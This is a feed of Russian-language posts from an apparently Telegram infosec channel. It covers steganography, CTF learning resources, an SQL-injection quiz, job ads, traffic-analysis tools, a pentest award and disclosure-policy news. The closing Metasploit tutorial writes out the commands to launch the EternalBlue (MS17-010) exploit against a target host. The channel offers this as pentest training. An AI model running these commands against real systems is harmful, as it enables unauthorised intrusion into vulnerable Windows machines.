Многие считают, что защита домена заканчивается на одной галочке в настройках. Но в реальности безопасность DNS требует куда большего внимания и усилий.
Что внутри:
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚9💯4👍2
Стеганография — метод скрытия данных в файлах, который, хотя и выглядит привлекательно, вызывает много споров.
Применяется ли она в реальных атаках, или это лишь теоретическая техника?
— Обход фильтров: стеганография скрывает данные в медиа-файлах, избегая обнаружения системами безопасности.
— Креативность: позволяет атакующим проявлять изобретательность, оставаясь незамеченными.
— Сложность и медлительность: требует больше усилий и времени, чем традиционные методы, и часто легко обнаруживается системами безопасности.
— Не всегда эффективна: в некоторых случаях проще использовать более прямолинейные методы, такие как фишинг или уязвимости.
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔5❤2🔥1
Подборка для тех, кто хочет разобраться, как работают флаги, таски и категории вроде web, crypto или forensics.
1. Вводный курс от picoCTF
Разработан Carnegie Mellon специально для новичков. Весёлый сюжет и простые таски.
2. Флаги и таски: введение в CTF для самых маленьких
Короткое и понятное введение на русском языке: что такое CTF, какие бывают таски и где брать первые флаги.
3. Интерактивная шпаргалка по категориям CTF
Примеры, инструменты и объяснения к каждой категории.
4. CyberChef
Веб-инструмент «швейцарский нож» CTF’ера. Декодируйте base64, XOR, rot13 и другие шифры — без командной строки.
5. OverTheWire: Bandit
Задачи про работу с терминалом, ssh, базовые команды и поиск флагов.
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍1👾1
🕵️ SQL-инъекция в хранимых процедурах
Вы тестируете веб-приложение с формой регистрации, которая вызывает хранимую процедуру register_user с параметрами.
При отправке данных возникает ошибка, связанная с некорректной обработкой специальных символов.
❓ Какую атаку вы бы использовали для эксплуатации этой уязвимости?
🐸 Библиотека хакера
#междусобойчик
Вы тестируете веб-приложение с формой регистрации, которая вызывает хранимую процедуру register_user с параметрами.
При отправке данных возникает ошибка, связанная с некорректной обработкой специальных символов.
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔3👍1
🤔4
SRE-инженер — удаленно (Москва)
Специалист по сетевой безопасности — от 250 000 ₽, удаленно (Москва)
Аналитик по информационной безопасности — офис (Казань)
Младший инженер по ИБ контейнерных сред — гибрид (Москва)
Системный администратор СЗИ на Linux — от 80 000 до 110 000 ₽, офис/гибрид (Екатеринбург)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👾1
🧰 Базовый сетевой арсенал для пентестера
➡️ tcpdump — захват и фильтрация сетевого трафика. Помогает при MITM, анализе инцидентов, выявлении уязвимостей.
➡️ nfdump — быстрая аналитика NetFlow-данных: кто, куда, когда и сколько.
Вместе покрывают захват и анализ трафика без GUI.
Команды — на картинке📎
🐸 Библиотека хакера
#буст
Вместе покрывают захват и анализ трафика без GUI.
Команды — на картинке
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👾4👍2
Пока мы с вами спокойно пьём кофе, эти ребята вскрывают домофоны, «угоняют» тачки и находят дыры в банковских приложениях.
🏆 Отгремела третья ежегодная Pentest Award — премия, где награждают настоящих рок-звезд мира кибербезопасности. Организаторы Awillix уже третий год собирают лучших из лучших, чтобы отметить их титанический труд, который обычно остаётся за кадром.
В этом году было просто нереально: взлом автомобильных систем через SMS, обход защиты VPN-клиентов, гонка состояний в платёжных системах и даже «Google в локальной сети»!👾
Огромный респект победителям и финалистам — вы настоящие герои цифрового мира!🤘
В этом году было просто нереально: взлом автомобильных систем через SMS, обход защиты VPN-клиентов, гонка состояний в платёжных системах и даже «Google в локальной сети»!
Огромный респект победителям и финалистам — вы настоящие герои цифрового мира!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤4👍2
Google Project Zero обновила правила раскрытия уязвимостей. Это серьезно повлияет на скорость распространения патчей и защиту от атак.
Что в карточках:
Если хотите быть в курсе последних изменений и узнать, как они могут повлиять на безопасность вашей инфраструктуры — читайте важные тезисы выше.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤2👍1
Metasploit — это мощный инструмент, который ускоряет процесс поиска и эксплуатации уязвимостей. Платформа предлагает сотни эксплойтов для атак на системы, приложения и сервисы.
Зачем это нужно:
Как работает:
1. Запуск Metasploit в терминале:
msfconsole
2. Поиск уязвимостей:
Например, чтобы найти эксплойт для MS17-010 (EternalBlue):
search eternalblue
3. Настройка и активация эксплойта:
После выбора эксплойта настраиваем его:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
exploit
Metasploit сам подберёт подходящий payload и подключится к целевой системе, если она уязвима.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👾4🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6👍3💯1